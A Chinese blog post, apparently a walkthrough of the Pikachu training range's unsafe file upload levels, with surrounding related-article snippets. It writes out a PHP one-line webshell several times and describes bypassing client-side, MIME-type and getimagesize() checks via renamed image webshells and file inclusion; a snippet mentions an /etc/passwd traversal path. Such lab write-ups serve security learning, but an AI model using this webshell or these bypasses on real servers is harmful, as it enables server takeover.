pikachu靶场通关-Unsafe Fileupload文件上传漏洞

最新推荐文章于 2024-03-19 13:33:26 发布
最新推荐文章于 2024-03-19 13:33:26 发布
阅读量554 收藏 4
点赞数 2
分类专栏: pikachu靶场通关 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43381463/article/details/128983699
版权

Unsafe Fileupload

0x00 不安全的文件上传漏洞

    文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。 如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上传一些恶意的文件,比如一句话木马,从而导致后台服务器被webshell。 
    所以,在设计文件上传功能时,一定要对传进来的文件进行严格的安全考虑。比如:
    --验证文件类型、后缀名、大小;
    --验证文件的上传方式;
    --对文件进行一定复杂的重命名;
    --不要暴露文件上传后的路径;

0x01 客户端check

1、准备木马文件pk01.php,内容<?php eval($_POST['code']); ?>

2、上传pk01.php,提示上传的文件不符合要求,请重新选择!

image-20230211112712784

3、说明前端对文件后缀进行了过滤

4、接下来制作一张图片马pk01.jpg,隐写内容:<?php eval($_POST['code']); ?>。尝试上传后成功,还暴露了路径

image-20230211113923377

5、根据暴露的路径进行访问,可以访问,但是无法传值

6、再次上传,并使用burpsuite进行改包,将pk01.jpg改为pk01.php

image-20230211114428477

7、可以发现文件上传成功,尝试访问并传值,通关

image-20230211114556939

0x02 服务端check

1、准备木马文件pk02.php,内容<?php eval($_POST['code']); ?>

2、上传pk02.php,提示上传的图片只能是jpg,jpeg,png格式的!

image-20230211120508486

3、说明前端对文件后缀进行了过滤

4、再次上传,改包,将pk02.php改为pa02.jpg,结果依然失败——其实题目已经给过提示了,这里需要修改Content-Type的值

5、也可以直接制作一张图片马pk02.jpg,隐写内容:<?php eval($_POST['code']); ?>

6、上传,并使用burpsuite进行改包,将pk02.jpg改为pk02.php

image-20230211121104387

7、可以发现文件上传成功,尝试访问并传值,通关

image-20230211121205974

0x03 getimagesize()

getimagesize()

getimagesize():将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。

GIF89a

图形交换格式编号89A,一个GIF89a图形文件就是一个根据图形交换格式(GIF)89a版(1989年7 月发行)进行格式化之后的图形。

步骤

方法一:

1、使用上几关的方式已经不能成功了,因为此关后端也使用getimagesize()进行了验证,并且还进行了重新命名

2、重新上传pk03.php,内容<?php eval($_POST['code']); ?>,并改包

image-20230211123251298

3、还是不行,放弃了,可能是姿势不够多

方法二:

1、上传图片马,获取图片马路径

2、配合文件包含漏洞

image-20230211124457995

贫僧法号云空丶
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
最新upload-labs文件上传漏洞靶场搭建安装,upload-labs Pass01-Pass20 二十关详解,靶场源码详解,upload-labs第一关到第二十关详解,一句话木马详细介绍
最新发布
2302_80946742的博客
04-16 830
在开始打靶场之前,我们先来介绍一下一句话木马。一句话木马(One-liner Trojan 或 Webshell)是一种常见的网络安全攻击工具,通常用于Web服务器的非法控制。它称为“一句话”,因为攻击者只需在目标服务器上的一个可访问的Web页面中植入一小段代码,就可以实现对服务器的远程控制。这种木马通常以PHP、ASP、JSP等服务端脚本语言的形式出现,因为这些语言能够在服务器上执行。一句话木马的代码很简短,但功能却非常强大,能够接收远程命令并在服务器上执行这些命令。?
upload-labs·文件上传(靶场攻略)
duoba_an的博客
03-19 1869
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。文件上传漏洞成因: 具备上传文件功能的Web等应用,未对用户选择上传的文件进行校验,使得非法 用户可通过上传可执行脚本而获取应用的控制权限。
Pikachu靶场通关笔记--unsafe fileupload (不安全文件上传)
weixin_45908624的博客
12-14 970
文件上传漏洞
Pikachu靶场——文件上传漏洞
知世郎
08-21 1295
​ 凡是存在文件上传的地方均有可能存在文件上传漏洞,关于上传文件操作的时候对方代码写的是否完整、是否安全,一旦疏忽了某个地方可能会造成文件上传漏洞
pikachu靶场-Unsafe Upfileupload
mlws1900的博客
05-10 980
什么是文件上传漏洞?​ 凡是存在文件上传的地方均有可能存在文件上传漏洞,关于上传文件操作的时候对方代码写的是否完整、是否安全,一旦疏忽了某个地方可能会造成文件上传漏洞
CTFhub 文件上传漏洞 靶场实战通关攻略
hackzkaq的博客
11-02 522
1、使用010editor新建文件,输入一句话木马,在其前面输入10次空格,再切换为十六进制的形式,在文件的最前面加入PNG文件的文件头。1、使用010editor新建文件,输入一句话木马,在其前面输入10次空格,再切换为十六进制的形式,在文件的最前面加入JPG文件的文件头。1、准备好一张PNG图片和一个脚本文件test.php,文件内容为一句话木马,在cmd命令行中输入命令进行文件拼接,1、准备好一张PNG图片和一个脚本文件test.php,文件内容为一句话木马,在cmd命令行中输入命令进行文件拼接,
pikachu靶场通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场通关
11-19
pikachu靶场通关
pikachu靶场包含网络安全中常见的漏洞
11-08
pikachu靶场通关包含网络安全中常见的漏洞、XSS、SQL注入、目录遍历、文件上传、文件包含、远程执行等常见的漏洞都集成在此靶场的源码上!!
pikachu靶场网盘下载
04-01
pikachu是一个漏洞练习平台。其中包含了常见的web安全漏洞,如果你是一个渗透测试学习者没有靶场练手,那么pikachu将是一个不错的选择。
pikachu靶场--不安全的文件下载/上传漏洞【7.1】~【8.3】
lmei1228的博客
06-14 455
文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。此时如果 攻击者提交的不是一个程序预期的的文件名,而是一个精心构造的路径(比如../../../etc/passwd),则很有可能会直接将该指定的文件下载下来。
文件上传漏洞upload靶场详细思路wp
2301_77004573的博客
07-26 770
1.先判断存不存在客户端防护(js检查),有的话之后所有步骤都需注意不能直接传php文件2.如果把做题流程比作一棵树,那么其中的主体方法就是树干,细节上的附加绕过就是树叶主体的做题方法(树干)有:解析漏洞,包含漏洞,00截断,条件竞争,二次渲染细节的树叶有:特殊后缀上传,大小写绕过," . / 空格"绕过,::$DATA绕过,双写绕过,MIME绕过,GIF89a文件头绕过而在做题时就是要以树干为主体,为树干补充好树叶,最后达成完美绕过。
Pikachu靶场01-文件上传漏洞详解
AkangBoy的博客
12-02 2025
本文主要介绍离线靶场Pikachu中的文件上传漏洞的原理和绕过姿势
文件上传漏洞(一) upload-labs靶场练习
好好睡觉
03-18 5324
常见文件上传漏洞类型总结、upload-labs靶场
Pikachu-Unsafe Fileupload
baynk的博客
11-19 1158
0x00 不安全文件上传漏洞概述 文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。 当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。 如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上传一些恶意的文件,比如一句话木马,从而导致后台服...
pikachu Unsafe Fileupload安全文件上传(皮卡丘漏洞平台通关系列)
箭雨镜屋
02-08 3959
一、client check 客户端验证 1、现象 先看一下直接上传php文件是个什么效果 如下图所示,刚选好文件,还没有点 “开始上传” 的时候,就弹出了提示 上传的文件不符合要求 2、绕过姿势 客户端验证一般两种绕过方法 (1)浏览器禁用javascript (2)burpsuite抓包改后缀 方法一、浏览器禁用javascript firefox有个插件叫JS Switch可以很方便的控制启用和禁用JS(有时候好像有点迟钝,可以多试几次) 先禁用JS,然后上传文件sh.
文件上传漏洞靶场-OSCP系列靶场过程
zkaqlaoniao的博客
10-08 344
当没有思路的时候,可以上传pspy64来尝试发现root下运行的进程没看够~?欢迎关注!
文件上传漏洞-03】服务器端检测与绕过靶场实战
cc
02-15 4815
服务器端检测验证类别:MIME类型:它的验证比较脆弱,因为MIME类型客户端可以自定义;白名单策略就是允许上传的类型文件后缀名检测:采取策略就是黑白名单策略,黑名单策略就是不允许上传的类型;对于黑名单策略的绕过,我们可以寻找一些其他可允许上传的类型,就是未在黑名单中出现的一些,对于采取白名单策略,我们只能上传白名单内的后缀名,上传完成之后,我们需要配合其他漏洞进行触发。
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值